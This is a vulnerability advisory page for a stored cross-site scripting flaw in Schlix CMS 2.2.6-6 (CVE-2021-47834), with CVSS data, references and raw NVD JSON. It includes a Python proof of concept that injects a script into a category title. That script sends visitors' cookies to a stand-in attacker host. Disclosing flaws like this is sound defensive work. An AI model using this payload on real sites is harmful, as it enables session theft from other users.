Security Vulnerability Report
CVE-2021-47834 CVSS 6.4 MEDIUM

CVE-2021-47834

Published: 2026-01-16 19:16:09
Last Modified: 2026-04-15 00:35:42

Description

Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users.

CVSS Details

CVSS Score
6.4
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

No configuration data available.

Schlix CMS 2.2.6-6

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
# CVE-2021-47834 PoC - Schlix CMS Stored XSS in Category Titles
# Authentication required (low-privilege user account)
import requests

target_url = "http://target-site.com/schlix"
username = "attacker_account"
password = "attacker_password"

session = requests.Session()

# Step 1: Login to obtain session cookie
login_url = f"{target_url}/admin/login"
login_data = {
    "username": username,
    "password": password
}
response = session.post(login_url, data=login_data)

# Step 2: Create malicious category with XSS payload
category_url = f"{target_url}/admin/categories/add"
xss_payload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>'
category_data = {
    "title": xss_payload,
    "description": "Malicious category for XSS attack"
}
response = session.post(category_url, data=category_data)

# The XSS payload is now stored and will execute when any user views the category page
print("XSS payload injected successfully")

References

https://www.exploit-db.com/exploits/49837
https://www.schlix.com/
https://www.vulncheck.com/advisories/schlix-cms-title-persistent-cross-site-scripting-authenticated

Raw JSON Data

JSON
{"cve": {"id": "CVE-2021-47834", "sourceIdentifier": "[email protected]", "published": "2026-01-16T19:16:08.723", "lastModified": "2026-04-15T00:35:42.020", "vulnStatus": "Deferred", "cveTags": [], "descriptions": [{"lang": "en", "value": "Schlix CMS 2.2.6-6 contains a persistent cross-site scripting vulnerability that allows authenticated users to inject malicious scripts into category titles. Attackers can create a new contact category with a script payload that will execute when the page is viewed by other users."}, {"lang": "es", "value": "Schlix CMS 2.2.6-6 contiene una vulnerabilidad de cross-site scripting persistente que permite a usuarios autenticados inyectar scripts maliciosos en los títulos de las categorías. Los atacantes pueden crear una nueva categoría de contacto con una carga útil de script que se ejecutará cuando la página sea vista por otros usuarios."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:P/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 5.1, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "LOW", "userInteraction": "PASSIVE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "LOW", "subIntegrityImpact": "LOW", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:C/C:L/I:L/A:N", "baseScore": 6.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.1, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-79"}]}], "references": [{"url": "https://www.exploit-db.com/exploits/49837", "source": "[email protected]"}, {"url": "https://www.schlix.com/", "source": "[email protected]"}, {"url": "https://www.vulncheck.com/advisories/schlix-cms-title-persistent-cross-site-scripting-authenticated", "source": "[email protected]"}]}}